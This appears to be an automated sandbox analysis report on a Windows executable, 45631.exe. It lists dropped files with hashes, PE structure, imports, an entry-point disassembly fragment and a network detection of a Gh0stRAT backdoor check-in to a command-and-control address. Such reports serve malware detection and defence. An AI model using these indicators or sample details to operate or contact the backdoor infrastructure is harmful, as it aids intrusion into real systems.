                                                  SHA-256:9E470B3505D8C12D21B00559CC47815E9FF64CE4534A065192F8FC45B2CA4345
                                                  SHA-512:945DE40C45189081D131D0B1F0C9CCBD88FB1AB2724F04BE927B10C89BAE55799D56BECF34F3198A7DBECD7DB03189B73C65E73BD51ADAC67F9B8E9ECDFE06E4
                                                  Malicious:false
                                                  Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5062442
                                                  Entropy (8bit):7.999518892518095
                                                  Encrypted:true
                                                  SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                  MD5:70C21DA900796B279A09040B00953E40
                                                  SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                  SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                  SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10681
                                                  Entropy (8bit):7.866148090449211
                                                  Encrypted:false
                                                  SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                  MD5:10A818386411EE834D99AE6B7B68BE71
                                                  SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                  SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                  SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):37274
                                                  Entropy (8bit):7.991781062764932
                                                  Encrypted:true
                                                  SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                  MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                  SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                  SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                  SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3889557
                                                  Entropy (8bit):7.9999387512441205
                                                  Encrypted:true
                                                  SSDEEP:98304:9AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:yndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                  MD5:AEB839AF0E0029F84CB23751AD327F45
                                                  SHA1:7EB4962B96CBA033BDA36DBE86CD7D5C7CED885C
                                                  SHA-256:E6DAD5400BB8A98A5C8A94FD24E4166B0F816E708BEB3946164C12978C75D3E3
                                                  SHA-512:1062B53845BB815126F234A477CBD88E36AE632B6952DD9C26085749A536CEF5E1F03A195D75FB5977FF0D839E1B9404FBC46336EFD196A8862B2961CD966F0A
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:GIF image data, version 89a, 10 x 10
                                                  Category:dropped
                                                  Size (bytes):8228
                                                  Entropy (8bit):7.978945512026199
                                                  Encrypted:false
                                                  SSDEEP:192:vBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:vBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                  MD5:C30B38F2D53A9A465CBE51563192E21B
                                                  SHA1:E9ACA6E501FBB33771D55EBA405F293ECC818F8B
                                                  SHA-256:777AF7F2F07BE3A4C7FFE030577FCB47E768403F494C7664730AD29ECDE7174C
                                                  SHA-512:6550BDE427DADB6F870EA6ED63C69C0FFCAC856E89C3BF1B21997DA509DF9C0E4F7D512976FF2C0ED9EB56BB1BEA7AB19BFBBA1ACEFD2A0F859B15B76C8BC23D
                                                  Malicious:false
                                                  Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):133136
                                                  Entropy (8bit):6.350273548571922
                                                  Encrypted:false
                                                  SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                  MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                  SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                  SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                  SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):122880
                                                  Entropy (8bit):6.002041749473993
                                                  Encrypted:false
                                                  SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FY:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gY
                                                  MD5:6A14E1D973FD7054015CD2DCCD530833
                                                  SHA1:CFD1324CB34FCEBF3075202371A20D6A98B13564
                                                  SHA-256:60B409CDE34E6EDEEFBB75C39D0134E2DBB5FBD0A3DEED6F3AB87BBA811516B4
                                                  SHA-512:53A80A909CCC659490D4E2A11D987D11EAEF484EE2FEDC821F52B1C3C24EC91CDBE3D128F77AF37C80FB935068199A0E006818304A5D56FDBF4E0E853D740098
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):6.229093189812865
                                                  Encrypted:false
                                                  SSDEEP:384:i3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/n:iOUkgfdZ9pRyv+uPzCMHo3q4tDghd
                                                  MD5:2FF76639B1C9C8CC77632101A97DF29E
                                                  SHA1:ED3831D581D2C3205FDD2D6E70ADC516CB9DA6CA
                                                  SHA-256:76741C18FB10F12EF3DCADCB9743DA1EC41E46EB64ACF80EE7CDE6C16A035B6B
                                                  SHA-512:19F93BF5A0C7564309ACF7364D06F406A32812BDF7A52992C86DF6A213616D4FC229D67DBAAFB4AA9EFF6B1B38A1D17BFC4A0AEEA3F9C5CD4D1E034CA60CEF72
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................m..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:y:y
                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                  Malicious:false
                                                  Preview:..
                                                  Process:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  File Type:GLS_BINARY_LSB_FIRST
                                                  Category:dropped
                                                  Size (bytes):300
                                                  Entropy (8bit):4.395543763326999
                                                  Encrypted:false
                                                  SSDEEP:3:ri9H5tH//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl/3lP92lbrisZ4mAUWKznd:ri9HHTwPYtyjtOsV39YBPZaoid0n
                                                  MD5:17E29CB8FDBFF3C7601CA0E51859EF0B
                                                  SHA1:3C129BC25E080BB77D827C510EEBCCABA912F542
                                                  SHA-256:6F254D74D3DB52086FB3E5A49ADC1526BDED4AAC2F5A2AEB81D7C14B7598402E
                                                  SHA-512:EBFF42E6C6A59461F49715BAA7FFC3515A73C64D9672416828E970D3FD1936D9B77BE2A38FB5EE28E8E680E7FB307C9C9B01286CA2E975A20C4F81F6363ED5A0
                                                  Malicious:false
                                                  Preview:..........<.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............3.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....`13....<YbY#.K.
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):2.6383083899317192
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:45631.exe
                                                  File size:31'614'976 bytes
                                                  MD5:71fb431d4793bb51ce762dc5d719a730
                                                  SHA1:39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
                                                  SHA256:01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
                                                  SHA512:a280449d7d5955805ae33fb03f927501b508c4fcdfc9e9216d8d4d0c3cd1c378d142533b180f0f09c2cd1addce8b944d22e03c6b89fcdf2ca2ee1338bfa09d6f
                                                  SSDEEP:3072:CTZr7Qctp6GVx9UpYDCu3j2I1lyXDGD04X6VitI37ot28feHxKaiI7ThJKX39/UB:Cd7Qcu69zDCA2wx7tI3428fex
                                                  TLSH:EC67643E545E122B87F9E729D5DD1A0BF090A59B36427C0EE8D713858A1B783BDC123E
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x-...~...~...~."k~...~."x~...~."{~...~...~...~...~...~."d~...~."j~...~."n~...~Rich...~........................PE..d...%5mX...
                                                  Icon Hash:1ed1f1f1e1e93c03
                                                  Entrypoint:0x1400046b0
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x586D3525 [Wed Jan 4 17:47:17 2017 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:bc775a76f703b07adc865091a82ee39c
                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F30C4C2BB5Ch
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F30C4C260EBh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  dec eax
                                                  mov dword ptr [esp+08h], ecx
                                                  dec eax
                                                  sub esp, 00000088h
                                                  dec eax
                                                  lea ecx, dword ptr [0000AABDh]
                                                  call dword ptr [0000699Fh]
                                                  dec eax
                                                  mov eax, dword ptr [0000ABA8h]
                                                  dec eax
                                                  mov dword ptr [esp+58h], eax
                                                  inc ebp
                                                  xor eax, eax
                                                  dec eax
                                                  lea edx, dword ptr [esp+60h]
                                                  dec eax
                                                  mov ecx, dword ptr [esp+58h]
                                                  call 00007F30C4C2FDD0h
                                                  dec eax
                                                  mov dword ptr [esp+50h], eax
                                                  dec eax
                                                  cmp dword ptr [esp+50h], 00000000h
                                                  je 00007F30C4C29723h
                                                  dec eax
                                                  mov dword ptr [esp+38h], 00000000h
                                                  dec eax
                                                  lea eax, dword ptr [esp+48h]
                                                  dec eax
                                                  mov dword ptr [esp+30h], eax
                                                  dec eax
                                                  lea eax, dword ptr [esp+40h]
                                                  dec eax
                                                  mov dword ptr [esp+28h], eax
                                                  dec eax
                                                  lea eax, dword ptr [0000AA68h]
                                                  dec eax
                                                  mov dword ptr [esp+20h], eax
                                                  dec esp
                                                  mov ecx, dword ptr [esp+50h]
                                                  dec esp
                                                  mov eax, dword ptr [esp+58h]
                                                  dec eax
                                                  mov edx, dword ptr [esp+60h]
                                                  xor ecx, ecx
                                                  call 00007F30C4C2FD7Eh
                                                  jmp 00007F30C4C29704h
                                                  dec eax
                                                  mov eax, dword ptr [esp+00000088h]
                                                  dec eax
                                                  mov dword ptr [0000AB34h], eax
                                                  dec eax
                                                  lea eax, dword ptr [esp+00000088h]
                                                  dec eax
                                                  add eax, 08h
                                                  dec eax
                                                  mov dword ptr [0000AAC1h], eax
                                                  Programming Language:
                                                  • [ASM] VS2005 build 50727
                                                  • [C++] VS2005 build 50727
                                                  • [ C ] VS2005 build 50727
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [RES] VS2005 build 50727
                                                  • [LNK] VS2005 build 50727
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xce480x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e0000xcd0c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x75c.pdata
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb2900x1c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0xb0000x238.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x9e5e0xa000d9633e0e6bbdc62fabd022d8ee71c353False0.4929443359375data5.82270589751864IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0xb0000x25d00x26002c131bac2dafc709cf96cd53b4e3007fFalse0.4009046052631579data5.38726836540401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xe0000xe2400xc800badac5ea6a137a49d77b6ff1d824af6fFalse0.855234375data7.591063161216864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .pdata0x1d0000x75c0x800a45f6f9c628e055fcff9592e603bf201False0.4697265625data4.196043641178827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .rsrc0x1e0000xcd0c0xce002974a26962f85b85a530007f73a836d0False0.5054801274271845data5.467811993857623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x1e4900x668Device independent bitmap graphic, 48 x 96 x 4, image size 0GermanGermany0.39146341463414636
                                                  RT_ICON0x1eaf80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0GermanGermany0.4771505376344086
                                                  RT_ICON0x1ede00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0GermanGermany0.5405405405405406
                                                  RT_ICON0x1ef080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GermanGermany0.4522921108742004
                                                  RT_ICON0x1fdb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GermanGermany0.463898916967509
                                                  RT_ICON0x206580x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GermanGermany0.45809248554913296
                                                  RT_ICON0x20bc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.5409751037344398
                                                  RT_ICON0x231680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.6393058161350844
                                                  RT_ICON0x242100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.5638297872340425
                                                  RT_ICON0x246780x668Device independent bitmap graphic, 48 x 96 x 4, image size 0GermanGermany0.37621951219512195
                                                  RT_ICON0x24ce00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0GermanGermany0.47580645161290325
                                                  RT_ICON0x24fc80x128Device independent bitmap graphic, 16 x 32 x 4, image size 0GermanGermany0.4831081081081081
                                                  RT_ICON0x250f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0GermanGermany0.5093283582089553
                                                  RT_ICON0x25f980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0GermanGermany0.572202166064982
                                                  RT_ICON0x268400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0GermanGermany0.47471098265895956
                                                  RT_ICON0x26da80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.508609958506224
                                                  RT_ICON0x293500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.6285178236397748
                                                  RT_ICON0x2a3f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.500886524822695
                                                  RT_GROUP_ICON0x2a8600x84dataGermanGermany0.6363636363636364
                                                  RT_GROUP_ICON0x2a8e40x84dataGermanGermany0.6363636363636364
                                                  RT_VERSION0x2a9680x34cdataGermanGermany0.471563981042654
                                                  RT_MANIFEST0x2acb40x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884
                                                  DLLImport
                                                  ADVAPI32.dllRegCreateKeyExW, RegSetValueExW, RegCloseKey, RegOpenKeyExW
                                                  SHELL32.dllShellExecuteW
                                                  KERNEL32.dllHeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetProcAddress, GetModuleHandleA, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, RtlUnwindEx, GetModuleFileNameW, FreeEnvironmentStringsA, MultiByteToWideChar, GetEnvironmentStrings, FreeEnvironmentStringsW, GetLastError, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSection, Sleep, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, HeapReAlloc, GetStringTypeA, GetStringTypeW, LCMapStringA, VirtualAlloc
                                                  Language of compilation systemCountry where language is spokenMap
                                                  GermanGermany
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-02T12:15:54.006747+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.2.6499998.217.152.2408917TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 12:14:03.421509027 CET49946443192.168.2.639.103.20.59
